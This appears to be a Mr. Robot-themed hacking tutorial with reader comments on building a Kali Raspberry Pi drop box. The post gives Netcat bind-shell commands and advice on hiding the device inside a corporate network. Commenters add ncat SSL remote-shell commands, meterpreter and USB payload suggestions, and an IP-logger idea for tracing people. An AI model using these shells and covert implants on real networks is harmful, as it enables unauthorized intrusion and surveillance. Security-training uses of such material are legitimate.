Welcome back, my tenderfoot hackers!
A number of you have written me telling me how much you enjoy the Mr. Robot series on USA Network. I am also a huge fan! If you haven't seen it yet, you should. It may be the best show on TV right now.
Mr. Robot is about a young man with a social conscience (and severe social anxiety and a wicked morphine habit) who works in cyber security by day, protecting the network of Evil Corporation, while at night he is a vigilante hacker for good (does this scenario fit anyone we know?). Eventually, he is recruited by a hacker collective known as fsociety (which looks and acts much like Anonymous) to bring down Evil Corporation.
One of the more interesting parts of the show, from my perspective, is that the hacking is realistic. No swirling, animated viruses like in so many other TV shows and movies, but rather good ol' command-line Linux.
The Hacking Raspberry Pi in Episode 4
In episode 4 ("eps1.3_da3m0ns.mp4"), Elliot, the main character, plans to use a Raspberry Pi to take control of the climate control system in the storage room where Evil Corp keeps its tape backups. If they can raise the temperature in that room enough, the tape backups will be rendered unusable.
On these tape backups are the records of 70% of the consumer debt in the world, including billions of dollars of student loans. The hackers believe that if they can destroy those records, millions of people will be free of their student loans and consumer debt held by Evil Corp.
In this tutorial, I will show you how to build a hacking Raspberry Pi (for those of you who are unaware, a Raspberry Pi is a tiny, inexpensive, credit-card-sized computer that is surprisingly powerful) that can be controlled remotely, similar to what Elliot is about to use in this episode.
Step 1: Download the ARM Version of Kali
The first step, of course, is to download the ARM version of Kali. The Raspberry Pi and many mobile devices use ARM CPUs because they are more energy efficient and run cooler, so Kali must be built specifically for that architecture.
Fortunately, the good folks at Offensive Security have already done this for us. Navigate to Offensive Security's download page to get the Raspberry Pi image. Before you do anything with the download, compare its SHA256 checksum with the one published next to the file on that page; a corrupted or tampered image is the last thing you want to boot on a box that will later sit inside someone else's network. Once the checksum matches, unzip it with WinRAR, WinZip or any other archiving tool that can extract the file.
Step 2: Download & Install Win32 Disk Imager
Now we need to install Win32 Disk Imager, which you can download from SourceForge. This tool writes the image to an SD card or USB drive. I recommend a fast SD card of at least 4 GB; a 16 GB card now costs about 7 dollars.
Step 3: Run Disk Imager
Now that you have installed Disk Imager, right-click on it and run it as administrator.
Select the Kali image in the "Image File" field, point the "Device" field at your SD card (double-check the drive letter, because whatever you select here gets overwritten), then click the "Write" button. Be patient; this can take some time.
If you are using Linux, things are a bit simpler. There is no need to download anything; you simply use the dd command (among other things, dd is used to create disk images in digital forensics). Assuming the image is named Kali-RPI.img, the SD card is /dev/sdc and we want to copy with a 512k block size (bs), we type:
kali > dd if=Kali-RPI.img of=/dev/sdc bs=512k
Two things to check before pressing Enter: confirm the device name with lsblk, because dd writes to whatever of= points at and pointing it at your system disk destroys that disk, and make sure no partition of the card is mounted. Run sync afterwards so the last buffered blocks actually reach the card before you pull it.
Step 4: Install the SD Card in the Raspberry Pi
Remove the SD card from your PC, insert it into the Raspberry Pi and boot it up. It boots to a command-line login prompt asking for a username and password. Type in:
username: root
password: toor
(These were the defaults when this was written. Kali images released since 2020 use kali / kali instead. Either way, change the password with passwd right after the first login, because the next step puts this box on someone else's network.) Then type:
kali > startx
This starts the X11 GUI for Kali. Success! Now you have a tiny Kali hacking tool that can be placed anywhere.
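The Linux side of Steps 1 through 4, with the checks a practitioner wants before a destructive write, as an added example that is not from the original article or from Offensive Security: it verifies the image against a SHA256 value, refuses a target that is a partition, is mounted, or carries the running system, and only then runs dd. The image name, the checksum value and the device name on the usage line are placeholders; take the real checksum from the download page.

```shell
#!/bin/sh
# Added example, not from the original article: flash the Kali ARM image with
# a checksum check and a sanity check on the target device before dd runs.
# Usage (as root):  sh flash-kali.sh kali-rpi.img <sha256 from download page> /dev/sdX
set -u

# Return 0 if FILE's SHA256 equals EXPECTED (lowercase hex), else 1.
# Uses GNU sha256sum when present, otherwise the BSD shasum.
verify_sha256() {
    file=$1; expected=$2
    if command -v sha256sum >/dev/null 2>&1; then
        actual=$(sha256sum "$file" | cut -d' ' -f1)
    else
        actual=$(shasum -a 256 "$file" | cut -d' ' -f1)
    fi
    [ "$actual" = "$expected" ]
}

# Return 0 only if DEV is a whole disk and nothing on it is mounted.
# MOUNTS defaults to /proc/mounts; a different file can be passed for testing.
# Partition names begin with the disk name (/dev/sdc1, /dev/mmcblk0p1), so a
# prefix match against the mount table also catches the disk holding "/".
# Caveat: a root filesystem on LVM appears as /dev/mapper/..., which this
# prefix match does not tie back to the physical disk.
is_safe_target() {
    dev=$1; mounts=${2:-/proc/mounts}
    case $dev in
        /dev/sd?|/dev/mmcblk?|/dev/nvme?n?) ;;   # whole-disk names only
        *) return 1 ;;                            # partition or unexpected path
    esac
    if grep -q "^$dev" "$mounts"; then
        return 1                                  # disk, or a partition of it, is in use
    fi
    return 0
}

# Write IMG to DEV. conv=fsync plus the trailing sync make sure the last
# buffered blocks reach the card before it is removed (GNU dd options).
write_image() {
    img=$1; dev=$2
    dd if="$img" of="$dev" bs=4M conv=fsync status=progress
    sync
}

# Only act when called with all three arguments; loading the file for its
# functions alone writes nothing.
if [ "$#" -eq 3 ]; then
    verify_sha256 "$1" "$2" || { echo "checksum mismatch, refusing to write $1" >&2; exit 1; }
    is_safe_target "$3"     || { echo "$3 is mounted, in use, or not a whole disk" >&2; exit 1; }
    write_image "$1" "$3"
fi
```

On a Pi the card itself shows up as /dev/mmcblk0; in a USB reader on a PC it is usually /dev/sdX. The script is deliberately strict about names so that a slip such as /dev/sdc1 (a partition) or /dev/sda (the mounted system disk) stops before dd starts.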
Step 5: Start a Netcat Listener on the Raspberry Pi
Now that we have the Raspberry Pi running Kali, we can place it anywhere within the Evil Corporation network. The Raspberry Pi has an Ethernet port, and you can add a wireless adapter. It is so small it can be hidden in numerous places, including inside a desktop computer, a telephone, a clock, etc., without being noticed.
Once it is connected, we can start a Netcat listener on it (Netcat is built into Kali) by typing:
kali > nc -l -p 6996 -e /bin/sh
This is a bind shell: Netcat listens on port 6996 and hands a /bin/sh to whoever connects, which lets Elliot reach a terminal on the Raspberry Pi from anywhere on the network that can route to that port. One caveat: the -e option exists in the traditional Netcat (nc.traditional) and in Nmap's ncat, but not in the OpenBSD Netcat that newer Kali images install as nc. If nc rejects -e, use one of those two instead.
Now Elliot can connect to the Raspberry Pi using Netcat on his own Kali system by typing:
kali > nc 192.168.1.105 6996
When he types ifconfig, he sees the Pi's interfaces come back, confirming he has a shell on the Raspberry Pi and is ready to go after Evil Corp's HVAC system. Replace 192.168.1.105 with the IP address of the Raspberry Pi in your environment.
Of course, there are other ways to reach the Raspberry Pi. He could use SSH, or install a VNC server and connect to it for full GUI control of Kali. Each option has a detection trade-off. The Netcat listener above sends everything in the clear and accepts a connection from anyone who finds the port, so a single packet capture exposes the session and any other host on the network gets the same shell. SSH and VNC are encrypted, but an SSH or VNC service appearing on a host that nobody recorded in the asset inventory is just as easy to spot in a port scan. None of them is invisible on a network that is actually being watched.
Step 6: Wreak Havoc
Now that Elliot has a Kali installation inside Evil Corporation's network, he has the multitude of tools in Kali available to wreak havoc on Evil Corporation. In episode 4, he wants to take control of the HVAC system and turn up the heat enough to ruin the backup tapes, and with Kali embedded in the network he is positioned to do that.
As the show progresses and Elliot demonstrates more hacks, I will try to keep you up to date on how he does them. Keep coming back, my greenhorn hackers, as I try to show you the hacks of Mr. Robot.
70 Comments
Great article as always OTW! I have some money lying around, do you guys think I should get a Raspberry Pi and use it as a hacking device? :D
Obsrv_
Since it's so inexpensive, I would say "Yes", but you may want to practice your hacking on a laptop or desktop before going to the Raspberry Pi.
Awesome, I think I'll get one, thanks :D
Nice tutorial! I love the Mr Robot show and this is nice to have some insight onto a way he might be able to achieve this, really makes me love the show even more!
This is cool, however it requires him to be on the same network as the Pi, since this is using a bind-TCP-like connection listener, and just because something has strong encryption does not mean that it is secure. A more secure way of controlling it would be via a reverse meterpreter HTTP payload. The Pi would likely be able to access the internet, and even if the IDS had packet inspection, this traffic would look perfectly legitimate! Nice idea though :)
PRYOCC:
Good point, but since Elliott works in cyber security for Evil Corp., he is inside the network.
Came here to say this. Care to do a write up on the meterpreter side?
Metasploit is not in the RPI version of Kali by default.
It's just like all of the other meterpreter tutorials, except instead of choosing windows/meterpreter/reverse_tcp it's windows/meterpreter/reverse_http(s). HTTPS is a better choice because the traffic cannot be inspected, as it is encrypted.
EDIT: If metasploit isn't in it, and it cannot be installed I am not sure
It can be installed. Just not there by default.
It can be installed, it's just a question of whether you can run it. Kali ARM itself will be using at least 20 MB of RAM, and you need about 600 MB minimum to run Metasploit comfortably. On the RPI2 you could, but you would be better off routing the traffic using something like Rhine Daemon.
How convenient, bought one yesterday.
Very entertaining! Please keep up this series.
Rofl xD Funny coincidence, but the guy's name is Malek. My first name spelled backwards is belak (some similarities) and my middle name is Dade. (Ever heard of the movie "Hackers"? "Dade" is the main guy. xD) So, it's quite fitting that I would get into things like this. lmao.
More Mr Robot tutorials please! Thank you :)
Think I'll watch the show first, then come back here.
I did the same thing. First read the top of article, then watched the show then came back here to read the full article.
Out of curiosity, after he is inside the system, how would he control the heat? Would he just scan the network looking for devices with a known port open and then determine the OS? Then after he found the device he'd use thc-hydra to crack the login details?
Remember, Elliott is on the cyber security team protecting Evil Corp, so he has inside information. So as a result, he probably won't need to scan and crack passwords.
If he were not on the inside, he could scan for IPs with port 80 open assuming that the HVAC system has an admin HTTP interface. Then, he would try the default passwords and if they don't work, progress to cracking the password. Then, he will have the admin interface and complete his goal of turning up the temperature in the area storing the tapes.
Oh yeah. I will have to start the series. I guess that I just assumed that he wouldn't be given the password to a sensitive area like that. So the only purpose of the Raspberry is to act as an entry point into the network?
Also, which network USB adapter (can't tell which one is used in the picture) would you recommend for the RP? Anyone have experience with the Edimax EW-7811Un?
Edimax EW-7811Un is very famous here and is part of several raspberry starter bundles.
Basically it works well. You have to be careful with power management, but I guess that holds for each adapter. I managed it with a simple modprobe option.
The chipset is RTL8188CUS. I think it's not directly on the list of aircrack-ng, but as far as I got with hacking (monitoring, dumping) it works fine. Don't know about AP feature. Haven't tried it yet but will find out soon.
No problems on a raspberry pi so far, just some strange behavior when used inside a VirtualBox running on the Mac - suddenly it freezes after some wlan monitoring etc. action; but I'm not sure if it's the adapter, the adapter on the Mac or the VBox.
(Author of the article, you should probably TEST this yourself before writing a guide on how to do it)
Some tips for anyone who actually wants to try to do this. First, all of the steps up to where you start cryptcat should be followed. Everything there is solid info. However, once you get to the command line to run cryptcat you'll notice that nothing happens. That's because although cryptcat comes installed on the full version of Kali, it's not included on the stripped-down RPi version. So, we'll need to install it.
Then comes problem number 2. Even if we try to execute a command to install cryptcat you'll notice that the install fails. In order to remedy this we'll need to update our sources. But wait, it gets better.
Problem 3. If we try to update kali using the apt-get command you'll notice that the update fails to complete reading the packages we download due to this raspberry pi image of kali having too old of a keyring. So, we'll have to update that before we can make any changes.
To update, enter the following code one line at a time:
rm -rf /var/lib/apt/lists
apt-get update
apt-get install kali-archive-keyring
If you get a message letting you know that your keyring is already the newest version after you type the last line then congrats! We're almost there.
Run:
apt-get update
And let it complete. Then, to install cryptcat, run:
apt-get install cryptcat
This will now successfully install cryptcat to your rpi build of kali and you can continue on your dubious ways.
Good guide OP, I just recommend you test these instructions yourself from scratch as your readers will to make the process easier for learning hackers.
When I do this I get a connection refused. I used 'ncat -l -p 443 --ssl -e /bin/bash' on the pi and 'ncat 127.0.0.1 443 --ssl' on my kali machine on my laptop. Does anyone know why?
Thanks for that supplemental material!
Not a problem. You might also want to revise your suggestion to use cryptcat, as it's only useful as an encrypted chatting service. There's no way to bind a remote shell like you can on netcat, its older brother, so there's not much "hacking" you can really do.
Thanks. I'll make the revisions.
No problem. You'll want them to use ncat as opposed to netcat though. It is bundled with Kali and can provide SSL encryption. Netcat sends commands in the clear, so it's not good for real-life scenarios, while ncat has a variety of encryption options. We'll stick to SSL. To use ncat to set up a reverse shell on the Pi you'll want to use the following commands:
Victim side: ncat -l -p 443 --ssl -e /bin/bash
Attacker side: ncat <IP address> 443 --ssl
That'll give you the desired effect. However, this will only work locally, I'll leave it up to you to determine how to execute this remotely. Cheers.
Any thoughts here? Can you explain why cryptcat wouldn't allow you to get a shell?
Cryptcat does not support the ability to execute programs like ncat does. From what I've gathered it's mainly used as an encrypted chat client. However, with ncat you can not only bind a terminal window using the -e command (-e /bin/bash), you can also transfer files between the machines without the need of a separate client.
Tape it on a drone.. and watch the fun!! Haha ;);)
By reading your great article , I got motivated to be like Elliot !
Great! I sure like him!
It would be better to use an Android smartphone to do this...
How so?
No.. you risk losing it... and your android being much costlier than pi.. no point ;);)
OTW, I just wanted to express my gratitude towards you for showing me this series. Unfortunately, it doesn't air over here (Pretty self-explanatory), but why should that stop me? I can't wait for the 29th when the new episode airs.
Once again: Thanks a hell of a lot! This series is great. Could hardly be better. Can I hug you? ;)
You are welcome!
Glad you like the show and this series. There is more coming soon.
I have a small question, disregarding this post. As many of your tutorials are website based, I have a question. Can you trace an IP address from a YouTube or Google+ profile? Sorry if this is stupid. I know of client-side attacks, but most have been fixed by updates to the software. I really want to know, but I'm fine if not, because I do this on virtual machines.
You can send them a message containing an IP logger link. (Or hack into Google's servers, good luck.)
Now that I have my PI all setup I have a few more questions.
On step #4 you said that after it boots up you login. So we attach it to a monitor via HDMI and plugin a usb keyboard?
Is there any way to have it automatically login, connect an open network, and start a ncat reverse shell? Does this script already exist?
Otherwise, the minute power is cut to the RPI (while transporting it for instance) it would reset and upon rebooting it would be stuck at the login step and without a keyboard and screen it would be hard to configure it from there.
I was wondering that too, so I just made a simple shell script that runs at boot to do all the commands. I am pretty new to this, so I wonder if there is a more efficient way to do it?
I'm a beginner at this and was just wondering how you would set up a script to run from startup. Also if you set this up at home and transported it without the screen and keyboard, how would you be able to connect it to the WiFi network?
Can you do a how-to on the new Mr. Robot episode where he tries to access the prison computer remotely through a USB?
That one seems pretty basic. You can do it with metasploit. Just use a reverse-tcp payload and put in your public ip. Forward that port to your box. Put the file on a usb and hope someone opens it
Great article, OTW. I'm going to start watching the series. And guess what, I am always running Kali on my Pi! I think it is suitable because of the portability.
thank you bro
If I were to do this and planned to leave the Pi in place for longer periods of time would I need a battery? If so what battery would you recommend that would be small and discreet but still provide a reasonable amount of battery life? Great tutorial by the way!
On the show, he hard-wires the Pi directly into the electrical system of the HVAC system. Since it's a 100 V device, I wouldn't recommend a battery.
If I didn't have access to a wall power source and wanted to be able to drop a Pi in and out of a place without having to plug it in what would you suggest for power supply?
What OTW means, is that Elliott spliced the Pi directly into the power system. In other words, Elliott took the power wires from the inside of something, cut them, and rigged them up to the Raspberry Pi.
I realize that, but what i'm asking is if I can't take apart things to steal power from them would I be able to keep it portable. Maybe by using a power bank or something of the sort so that I could essentially hide my pi in a box and just drop it somewhere in the target company or whatever for a few days without running out of power. Then I or someone would come pick it up without having to unhook it from a panel or something.
You might be able to get a few hours out of it, or maybe even one day, but days aren't going to work unfortunately.
Thought: where the hell did he get a network cable for the Pi? Would it be better to have a GSM module instead?
There are a lot of possibilities that are not clearly defined in the show. He patched into the HVAC system, so maybe he got a network connection there as well.
Might also work.
My first idea was adding an additional wifi adapter to the pi and connect to it directly, then via ethernet into the network. No need for nc then, right? However he needs to be somehow nearby (depending on the wifi adapter used) which can be a problem, especially in the area where he placed the pi.
However this could also be a problem for gsm connection.
Great article as always! Thx for that.
I'm curious however, what it is for (maybe it will be clear in the last episode)?
Elliot wants to blow up the heating.
He installs the pi somewhere around it and connects to the network (via cable or Wi-fi? I'm not sure). All I saw was that he wired power supply for the pi. No extra GPIO connection which could be used to control some hardware. So all the hacking will be done via net (maybe SCADA etc.?).
Now: to access the pi he needs to be in the same network, otherwise he can't reach the ip/port. So anything he can do from the pi could(!) be done from wherever he connects to it, right? So why the pi?
Or is it just to not being traced back to his workstation?
Maybe I'm just overlooking something here, but I want to understand.
First, Elliot is not blowing up the heating system, simply turning up the temperature high enough to render the tapes unusable.
The Pi is a hacking system. Now that he has an entry point into the network, he can hack whatever he needs within the system, presumably a PLC controller for the heating system.
Thx for the quick reply.
Sure, I used the wrong words. Sorry for that.
So it means that he installed the pi "just" to have a (in this case) kali system in the network that he can control what his normal workstation, from where he would connect to it, does not provide?
Hello! Thanks for the great tutorial!
I am experiencing some difficulties, however. I'm attempting to re-use an old VGA monitor, at least temporarily. I've got a cheap HDMI-VGA cable, which I have tested with a laptop and verified that both the cable and my monitor do work. I also got the Pi to work with this setup running Raspbian. I did have to change some values in /boot/config.txt to make it work with the cable. But when I boot the Pi into Kali, the screen remains blank, and I can't even find config.txt...
What should I do?
Never mind, I figured it out. For anyone who has similar difficulties, my solution was to create a file called config.txt on the SD card in the FAT partition and put this in it:
hdmi_drive=2
config_hdmi_boost=4
hdmi_group=1
hdmi_force_hotplug=1
I found this ebook, thought it might be useful for this article. It's called Raspberry Pi for Secret Agents; here's the link to download:
http://filepi.com/i/qtu5fSd
I like this one, it's a serious method.
thanks for this man
can we hack another pi on the same network if we know its ip address and its password format?
Awesome tutorial, very interesting.
Although I have a few questions I require you guys' expertise on:
Thank you for your insight on this matter, and once again congratulations on the great job. Not just this tutorial but everything you've been teaching us. xD
Maybe using a socksproxy?
or using something like remote.it
Great article OTW! Lots of good information.
For the starters like me, I found this book(Ebook) few days ago, and helped me to setup my Raspberry PI with Kali.
Penetration Testing with Raspberry Pi - Second Edition
By: Michael McPhee; Jason Beltrame
Publisher: Packt Publishing
Pub. Date: November 30, 2016
Web ISBN-13: 978-1-78712-623-7
Print ISBN-13: 978-1-78712-613-8
Pages in Print Edition: 316
Hey Occupytheweb, nice to see these tuts. I wondered a little during the series if all these hacks could really happen. Now I see: yes they can. Thanks for this!
But I got a question with this raspberry thing. Where did the hacking pi connect with the evil corp network? May be I overlooked that, but I scrolled back and forth and so on ;o) I did not see it. Thanks so far, you are great!
Excellent tutorial. I am glad I joined this site and am learning a lot. A couple of questions though, not directly related to this tutorial.
Any thoughts on above ??
Thanks
D
If you know this you can hack 8/10 companies xD
This was really helpful. I've been trying to setup my RPi with DHCP on my laptop and could never get it right.
is this the like windows/meterpreter/reverse_tcp?